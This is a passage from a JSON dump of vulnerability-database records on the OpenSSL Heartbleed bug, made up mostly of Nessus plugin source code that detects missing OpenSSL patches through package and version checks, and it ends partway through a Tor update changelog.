value:\"2014-320\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Amazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"A missing bounds check was found in the way OpenSSL handled TLS\nheartbeat extension packets. 
This flaw could be used to reveal up to\n64k of memory from a connected client or server.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://heartbleed.com/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n # http://aws.amazon.com/amazon-linux-ami/security-bulletins/ALAS-2014-320/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c70c979\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update openssl' to update your system and restart all\nservices that are using openssl. While the new package is still\nnamed openssl-1.0.1e, it does contain the fix for CVE-2014-0160.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat (Heartbleed) Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"openssl-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-debuginfo-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-devel-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-perl-1.0.1e-37.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"openssl-static-1.0.1e-37.66.amzn1\")) flag++;\n\nif (flag)\n{\n report = rpm_report_get();\n if (!egrep(pattern:\"package installed.+openssl[^0-9]*\\-1\\.0\\.1\", string:report)) exit(0, \"The remote host does not use OpenSSL 1.0.1.\");\n\n if (report_verbosity > 0) security_hole(port:0, extra:report);\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2022-05-21T15:15:33", "description": "The Attachmate Reflection install on the remote host is affected by an out-of-bounds read error known as the 'Heartbleed Bug' in the included 
OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-06-30T00:00:00", "type": "nessus", "title": "Attachmate Reflection Heartbeat Information Disclosure (Heartbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["cpe:/a:attachmate:reflection"], "id": "ATTACHMATE_REFLECTION_HEARTBLEED.NASL", "href": "https://www.tenable.com/plugins/nessus/76309", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76309);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Attachmate Reflection Heartbeat Information Disclosure (Heartbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Attachmate Reflection install on the remote host is affected by an\nout-of-bounds read error known as the 'Heartbleed Bug' in the included\nOpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n 
script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/1708.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/2502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Reflection 14.1 SP3 Update 1 (14.1.3.247) or 2014 R1 Hotfix\n4 (15.6.0.660) or greater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:attachmate:reflection\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"Settings/ParanoidReport\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = kb_smb_transport();\nappname = 'Attachmate Reflection';\n\ndisplay_names = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nin_registry = FALSE;\n# Ignore Attachmate Reflection X in this plugin\nforeach key (display_names)\n if (\n \"Attachmate Reflection \" >< key\n &&\n \"Attachmate Reflection X \" >!< key\n ) in_registry = TRUE;\n\nif (!in_registry) audit(AUDIT_NOT_INST, appname);\n\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\npath = NULL;\n\nforeach key (keys(display_names))\n{\n display_name = display_names[key];\n\n if (\n \"Attachmate Reflection \" >!< display_name\n ||\n \"Attachmate Reflection X \" >< display_name\n )\n continue;\n key -= '/DisplayName';\n\n key -= 'SMB/Registry/HKLM/';\n key = str_replace(string:key, find:\"/\", replace:'\\\\');\n break;\n}\n\n# Very rough check on ver in registry\ndisplay_version_key = key + \"\\DisplayVersion\";\ndisplay_version = get_registry_value(handle:hklm, item:display_version_key);\nif (\n isnull(display_version) ||\n display_version !~ \"^(14\\.1\\.3|15\\.6)($|[^0-9])\"\n)\n{\n RegCloseKey(handle:hklm);\n close_registry();\n if (isnull(display_version))\n audit(AUDIT_UNKNOWN_APP_VER, appname);\n else\n audit(AUDIT_NOT_INST, appname + \"14.1.3.x / 2014 
R1\");\n}\n\n# Get install dir\ninstall_location_key = key + \"\\InstallLocation\";\ninstall_location = get_registry_value(handle:hklm, item:install_location_key);\nif (isnull(install_location))\n{\n RegCloseKey(handle:hklm);\n close_registry();\n audit(AUDIT_PATH_NOT_DETERMINED, appname);\n}\nRegCloseKey(handle:hklm);\n\nitem = eregmatch(pattern:\"^(.+\\\\)[^\\\\]*$\", string:install_location);\nif (isnull(item))\n{\n close_registry();\n audit(AUDIT_PATH_NOT_DETERMINED, appname);\n}\nclose_registry(close:FALSE);\n\npath = item[1];\n\n# At the least, make sure a file exists\n# to verify the registry info a bit\nexe = path + \"openssl.dll\";\nexe_exists = hotfix_file_exists(path:exe);\nhotfix_check_fversion_end();\nif (!exe_exists) audit(AUDIT_FN_FAIL, \"hotfix_file_exists\", \"data that indicates the file '\"+exe+\"' is no longer present.\");\n\n# Parse out numeric version from registry entry version\n# Registry version is formatted like :\n# major.minor.{sp}{build}\n# where {sp} is one digit (for now) and {build} is three\nmatches = eregmatch(string:display_version, pattern:\"^(\\d+)\\.(\\d+)\\.(\\d+)(\\d{3})\");\nif (matches)\n{\n major = matches[1];\n minor = matches[2];\n sp = matches[3];\n build = matches[4];\n version = major + \".\" + minor + \".\" + sp + \".\" + build;\n}\nelse\n audit(AUDIT_UNKNOWN_APP_VER, appname);\n\n# 14.1.3.000 is 14 SP3 (earliest vuln)\n# 15.6.0.000 is 2014 R1 (earliest vuln)\n# Vendor states 14.1.3.247 / 15.6.0.660 is main app fix ver\nif (\n version =~ \"^14\\.\" && ver_compare(ver:version, fix:\"14.1.3.247\", strict:FALSE) < 0\n ||\n version =~ \"^15\\.\" && ver_compare(ver:version, fix:\"15.6.0.660\", strict:FALSE) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Product : ' + appname +\n '\\n Installed version : ' + version +\n '\\n Fixed version : Reflection 14.1 SP3 Update 1 (14.1.3.247) / 2014 R1 Hotfix 4 (15.6.0.660)' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else 
security_warning(port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, appname, display_version);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:34:26", "description": "Updated openssl packages that fix one security issue are now available for Red Hat Storage 2.1.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter.\n\nAll users of Red Hat Storage are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : Storage Server (RHSA-2014:0377) (Heartbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssl", "p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo", "p-cpe:/a:redhat:enterprise_linux:openssl-devel", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "p-cpe:/a:redhat:enterprise_linux:openssl-static", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-0377.NASL", "href": "https://www.tenable.com/plugins/nessus/79005", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0377. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79005);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"RHSA\", value:\"2014:0377\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"RHEL 6 : Storage Server (RHSA-2014:0377) (Heartbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated openssl packages that fix one security issue are now available\nfor Red Hat Storage 2.1.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. 
A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll users of Red Hat Storage are advised to upgrade to these updated\npackages, which contain a backported patch to correct this issue. 
For\nthe update to take effect, all services linked to the OpenSSL library\n(such as httpd and other SSL-enabled services) must be restarted or\nthe system rebooted.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:0377\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-0160\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-static\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0377\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"redhat-storage-server\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Storage Server\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-1.0.1e-16.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-debuginfo-1.0.1e-16.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-devel-1.0.1e-16.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-perl-1.0.1e-16.el6_5.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"openssl-static-1.0.1e-16.el6_5.7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-debuginfo / openssl-devel / openssl-perl / etc\");\n 
}\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:12:58", "description": "- tor 0.2.4.22 [bnc#878486] Tor was updated to the recommended version of the 0.2.4.x series.\n\n - major features in 0.2.4.x :\n\n - improved client resilience\n\n - support better link encryption with forward secrecy\n\n - new NTor circuit handshake\n\n - change relay queue for circuit create requests from size-based limit to time-based limit\n\n - many bug fixes and minor features\n\n - changes contained in 0.2.4.22: Backports numerous high-priority fixes. These include blocking all authority signing keys that may have been affected by the OpenSSL 'heartbleed' bug, choosing a far more secure set of TLS ciphersuites by default, closing a couple of memory leaks that could be used to run a target relay out of RAM.\n\n - Major features (security)\n\n - Block authority signing keys that were used on authorities vulnerable to the 'heartbleed' bug in OpenSSL (CVE-2014-0160).\n\n - Major bugfixes (security, OOM) :\n\n - Fix a memory leak that could occur if a microdescriptor parse fails during the tokenizing step.\n\n - Major bugfixes (TLS cipher selection) :\n\n - The relay ciphersuite list is now generated automatically based on uniform criteria, and includes all OpenSSL ciphersuites with acceptable strength and forward secrecy.\n\n - Relays now trust themselves to have a better view than clients of which TLS ciphersuites are better than others.\n\n - Clients now try to advertise the same list of ciphersuites as Firefox 28.\n\n - includes changes from 0.2.4.21: Further improves security against potential adversaries who find breaking 1024-bit crypto doable, and backports several stability and robustness patches from the 0.2.5 branch.\n\n - Major features (client security) :\n\n - When we choose a path for a 3-hop circuit, make sure it contains at least one relay that supports the NTor circuit extension handshake. 
Otherwise, there is a chance that we're building a circuit that's worth attacking by an adversary who finds breaking 1024-bit crypto doable, and that chance changes the game theory.\n\n - Major bugfixes :\n\n - Do not treat streams that fail with reas